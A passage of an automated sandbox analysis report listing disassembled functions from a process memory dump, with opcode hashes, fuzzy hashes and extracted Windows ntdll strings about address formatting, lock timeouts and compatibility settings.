                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 583ead36f96a6227cf0af38562cabfc4cac91ed17daa197f64d8a6a97d1869e9
                                                                                                                        • Instruction ID: ecbad24a14dae8c6565ca7ff92bc82368afe1deca5d0e4758156b88aeb063a11
                                                                                                                        • Opcode Fuzzy Hash: 583ead36f96a6227cf0af38562cabfc4cac91ed17daa197f64d8a6a97d1869e9
                                                                                                                        • Instruction Fuzzy Hash: FC90027120140402D240715C4804786000D87D0341F56C026A5065554F8A5D8ED5AA65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 67fbedc1d68c51ecab3dd4298cfd97ca636a6b752f90c43186316abed17120bb
                                                                                                                        • Instruction ID: 6d2a40f77ab9a111f1729b32721d5d46e90f4381e6f30e3caab9f84f80e38b64
                                                                                                                        • Opcode Fuzzy Hash: 67fbedc1d68c51ecab3dd4298cfd97ca636a6b752f90c43186316abed17120bb
                                                                                                                        • Instruction Fuzzy Hash: B790022160140502D201715C4804656000E87D0381F96C037A1025555FCE298A92E531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e9221f26a9102899f33d99becfcabb6c518a538ec935630c506ed65969f51c33
                                                                                                                        • Instruction ID: 238c9dd746f07b18afd6714cfcfa40eec7e81ec5461cd7997a39382668ab3c3a
                                                                                                                        • Opcode Fuzzy Hash: e9221f26a9102899f33d99becfcabb6c518a538ec935630c506ed65969f51c33
                                                                                                                        • Instruction Fuzzy Hash: FC90026120180403D240755C4C04647000D87D0342F56C026A2065555F8E2D8D51A535
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 89e15184e43807f7e914ec789a4a5010ceea73b7f246bcb631467970fc9510da
                                                                                                                        • Instruction ID: 488747bfc32ccda6f545cb66549a743c544695c9a98a9fea34c7a13b42806e3e
                                                                                                                        • Opcode Fuzzy Hash: 89e15184e43807f7e914ec789a4a5010ceea73b7f246bcb631467970fc9510da
                                                                                                                        • Instruction Fuzzy Hash: BC90022130140402D202715C4814646000DC7D1385F96C027E1425555E8A298A53E532
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e11fe522c0de329afa01e3d4a36a6e0eaf3a1e9609ecfcf0197246a2329e65e3
                                                                                                                        • Instruction ID: a05e28f732c49a7f377ac59401d139e502c35bc9656563d362a081bddf0449f7
                                                                                                                        • Opcode Fuzzy Hash: e11fe522c0de329afa01e3d4a36a6e0eaf3a1e9609ecfcf0197246a2329e65e3
                                                                                                                        • Instruction Fuzzy Hash: 2290023120180402D200715C4C08787000D87D0342F56C026A5165555F8A69C991A931
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 261da1631a60493cebdc59251c157c16a05f12398b77b03aa271d29475d4f6a3
                                                                                                                        • Instruction ID: 5128c0ed6958668417696950bde7e3dec42c350d6a641fbf52bbc40f1c3f8d3d
                                                                                                                        • Opcode Fuzzy Hash: 261da1631a60493cebdc59251c157c16a05f12398b77b03aa271d29475d4f6a3
                                                                                                                        • Instruction Fuzzy Hash: 7C900221601400424240716C8C44946400DABE1351756C136A0999550E895D89659A65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3d9ee8fb889494de9fccb04ade6967b1f4851d5ea8ee8ae0650d25b611dbb9c6
                                                                                                                        • Instruction ID: 05472c96300ad23e0ff9aa0d0847a08ba6c9e9c967183e25afea71043298fc7a
                                                                                                                        • Opcode Fuzzy Hash: 3d9ee8fb889494de9fccb04ade6967b1f4851d5ea8ee8ae0650d25b611dbb9c6
                                                                                                                        • Instruction Fuzzy Hash: B890023120180402D200715C4C1474B000D87D0342F56C026A1165555E8A298951A971
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aaf3560c78da03cf2ee011ca1adfa08775617b09aa26ab05c6aeda221bc43a13
                                                                                                                        • Instruction ID: 939d7dec872ea5a04bd8cdada32ccd33541b547c9ceb9abdbbf39d4ac2e50df8
                                                                                                                        • Opcode Fuzzy Hash: aaf3560c78da03cf2ee011ca1adfa08775617b09aa26ab05c6aeda221bc43a13
                                                                                                                        • Instruction Fuzzy Hash: 0D900221211C0042D300756C4C14B47000D87D0343F56C12AA0155554DCD1989619921
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c300f3bc18582eca059b6e40c841599042ce2b7836fcc180506488ce5d84869e
                                                                                                                        • Instruction ID: 37124fad9fd339860af2a8b5c0023568af2845483510c01c45545f653b3b3db8
                                                                                                                        • Opcode Fuzzy Hash: c300f3bc18582eca059b6e40c841599042ce2b7836fcc180506488ce5d84869e
                                                                                                                        • Instruction Fuzzy Hash: 4590026134140442D200715C4814B46000DC7E1341F56C02AE1065554E8A1DCD52A526
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce1585cf38daf8d37169e26257818337ffbc9b435e930f0d79d9c38e18b756be
                                                                                                                        • Instruction ID: 0ff50fb99535f824ec329644596b8ab6fddffec53b21a7036da555ab39757a5b
                                                                                                                        • Opcode Fuzzy Hash: ce1585cf38daf8d37169e26257818337ffbc9b435e930f0d79d9c38e18b756be
                                                                                                                        • Instruction Fuzzy Hash: 8E90026121140042D204715C4804746004D87E1341F56C027A2155554DC92D8D619525
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA3090 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9b2658f6235540e15314d6b2050381912333ce962fb41df7c13b52328dda952a
                                                                                                                        • Instruction ID: 228de575692ec694a14572aa6cb89b22f3f718b9b816216ac9a411d8ee40a751
                                                                                                                        • Opcode Fuzzy Hash: 9b2658f6235540e15314d6b2050381912333ce962fb41df7c13b52328dda952a
                                                                                                                        • Instruction Fuzzy Hash: F190022124140802D240715C8814747000EC7D0741F56C026A0025554E8A1A8A65AAB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA3010 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: daa6260a6b49bbc63ff6dca9decd7ccd554782a5ae28712fbfdceb8625929905
                                                                                                                        • Instruction ID: c4dfd3fbaece319804a4c6c7c817d29f46313497979bf1c53f0d0eac5ee3fc2e
                                                                                                                        • Opcode Fuzzy Hash: daa6260a6b49bbc63ff6dca9decd7ccd554782a5ae28712fbfdceb8625929905
                                                                                                                        • Instruction Fuzzy Hash: 7C90022120184442D240725C4C04B4F410D87E1342F96C02EA4157554DCD1989559B21
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA39B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f6c4c89fdec49780596a5a3832bb9a0fad6d3ff7c6fd0be6a12c89eccbae2ea
                                                                                                                        • Instruction ID: 3254ad62a46a8038a9c88bd0bc0feb299a5d0f54c59706c76e18b894e49b2c5a
                                                                                                                        • Opcode Fuzzy Hash: 6f6c4c89fdec49780596a5a3832bb9a0fad6d3ff7c6fd0be6a12c89eccbae2ea
                                                                                                                        • Instruction Fuzzy Hash: FE90022124545102D250715C4804656400DA7E0341F56C036A0815594E89598955A621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA3D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a87d783658829e8ed7aa5d7b48a4bbd1c0a3efa163c4902c9ec9e013dcdd5ee2
                                                                                                                        • Instruction ID: 1384116898e305fbb1739aafaef20395279583da080cd62a59f45d77c9c7013e
                                                                                                                        • Opcode Fuzzy Hash: a87d783658829e8ed7aa5d7b48a4bbd1c0a3efa163c4902c9ec9e013dcdd5ee2
                                                                                                                        • Instruction Fuzzy Hash: B4900231202401429640725C5C04A8E410D87E1342B96D42AA0016554DCD1889619621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3174da1c5800fcac4edfcff034aacc1dd05416f3b38cafd61bd5a10760404f61
                                                                                                                        • Instruction ID: 1a98cc72acd5fc64ff175106ef57181adac41bd623a31c15cb5524e1aede476c
                                                                                                                        • Opcode Fuzzy Hash: 3174da1c5800fcac4edfcff034aacc1dd05416f3b38cafd61bd5a10760404f61
                                                                                                                        • Instruction Fuzzy Hash: 6F90023520140402D610715C5C04686004E87D0341F56D426A0425558E8A5889A1E521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction ID: 21e28bf2a6fbf769e68b0db791b53455f219abaa142cff6306cdddb4e629e80e
                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 42f158074d181d79928ca674518bac44fc57786835956ff5ce6abf68df3f6f06
                                                                                                                        • Instruction ID: 1848268112dc38f33cdb3488adcdb0c7cd873f043f9d8e3c8e30056ad328c941
                                                                                                                        • Opcode Fuzzy Hash: 42f158074d181d79928ca674518bac44fc57786835956ff5ce6abf68df3f6f06
                                                                                                                        • Instruction Fuzzy Hash: 5851B5B6A00116BFCB10DBAC8990A7FF7B8BB59700B14826AF465D7681D374DE6087E1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 0751c862681c12354027a27c1dd75dc7514490ff8bfadc86c4a8cfbf8142cd51
                                                                                                                        • Instruction ID: 545c5209a73275f32a1e2e34c28b750d64e82e1445e7fd94537a953bf526992b
                                                                                                                        • Opcode Fuzzy Hash: 0751c862681c12354027a27c1dd75dc7514490ff8bfadc86c4a8cfbf8142cd51
                                                                                                                        • Instruction Fuzzy Hash: FF511771A00645AECF34DF5CC9D08BFB7F9EB54300B9488A9F596C7682E674DE908760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00A97630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ExecuteOptions, xrefs: 00AD46A0
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AD46FC
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AD4742
                                                                                                                        • Execute=1, xrefs: 00AD4713
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00AD4787
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AD4725
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AD4655
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: c00ede84f7268e9775f4c5602cd837fcb8ec5232c26a66f2e416f9bafa47a2a0
                                                                                                                        • Instruction ID: 95dba90f6963086014debaa5081a49bdabb5db7aeb2ce108020de53c4480768e
                                                                                                                        • Opcode Fuzzy Hash: c00ede84f7268e9775f4c5602cd837fcb8ec5232c26a66f2e416f9bafa47a2a0
                                                                                                                        • Instruction Fuzzy Hash: 615106357442197BDF10AFA4DD86FEE73F8EB48300F1404A9E605AB2D1EB709E418B60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 1357d62e57f39cf352ef600d2bae9c2e23f945024c25be288e3b5d37b5ce6fc5
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 77818170E262499EDF24CF68C8517FEBBB5AF86310F18425AE861A72D3C77498408B70
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00A8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AD02E7
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AD02BD
                                                                                                                        • RTL: Re-Waiting, xrefs: 00AD031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: 177c23f39b3fca2d9fc633acd03d349c1cbc8199e64ed9b7d9e70319eef217cb
                                                                                                                        • Instruction ID: 3f869b2b2ae82b678d7aa22ad1c0a28b376332d7d1c6b6d32ba9ee6f564c8fb2
                                                                                                                        • Opcode Fuzzy Hash: 177c23f39b3fca2d9fc633acd03d349c1cbc8199e64ed9b7d9e70319eef217cb
                                                                                                                        • Instruction Fuzzy Hash: 68E1BE306047429FD725DF28C985B6AB7F0BB88314F240A6EF5A68B3E1E774D944CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00A9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD7B7F
                                                                                                                        • RTL: Re-Waiting, xrefs: 00AD7BAC
                                                                                                                        • RTL: Resource at %p, xrefs: 00AD7B8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 059353c498e2053fc51d295d1b47321dea28465a7d159b9906d6abea99fca887
                                                                                                                        • Instruction ID: 2621454ab67f3a6b372802b2e53172175178f7fabf95f3d24c0fa32c017c06dc
                                                                                                                        • Opcode Fuzzy Hash: 059353c498e2053fc51d295d1b47321dea28465a7d159b9906d6abea99fca887
                                                                                                                        • Instruction Fuzzy Hash: 3641E5353147029FCB24DF29DE41B6AB7E5EF88710F100A2EF9569B781DB71E8058BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00A9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00AD7294
                                                                                                                        • RTL: Re-Waiting, xrefs: 00AD72C1
                                                                                                                        • RTL: Resource at %p, xrefs: 00AD72A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: 0d9d4978f5f5154dfb4272597049cb751cee416553e8c90cab0833fda8af0ea0
                                                                                                                        • Instruction ID: 12e8f58f96384b03f5febd663358a7e2788862bb11d14e5f8934db10893999ab
                                                                                                                        • Opcode Fuzzy Hash: 0d9d4978f5f5154dfb4272597049cb751cee416553e8c90cab0833fda8af0ea0
                                                                                                                        • Instruction Fuzzy Hash: CA410331704252ABCB24DF25CD42BAAB7E5FB94710F10061AF956AB381EB30EC1297E1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B12300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: f54285c6cebfbe0a39382e9fa0e05cb653eb2a7ed9453c2f8f71f029848db4e4
                                                                                                                        • Instruction ID: c35cebbb71f47b854bc7764d3e100836d074e40874ead63142d843c1a4d35c60
                                                                                                                        • Opcode Fuzzy Hash: f54285c6cebfbe0a39382e9fa0e05cb653eb2a7ed9453c2f8f71f029848db4e4
                                                                                                                        • Instruction Fuzzy Hash: 2C318472A00219AFCB20DF29DD41BEFB7F8EB54750F844595E859E3241EB34AA548BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00AA7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.1430135301.0000000000A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_a30000_okawzsv.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
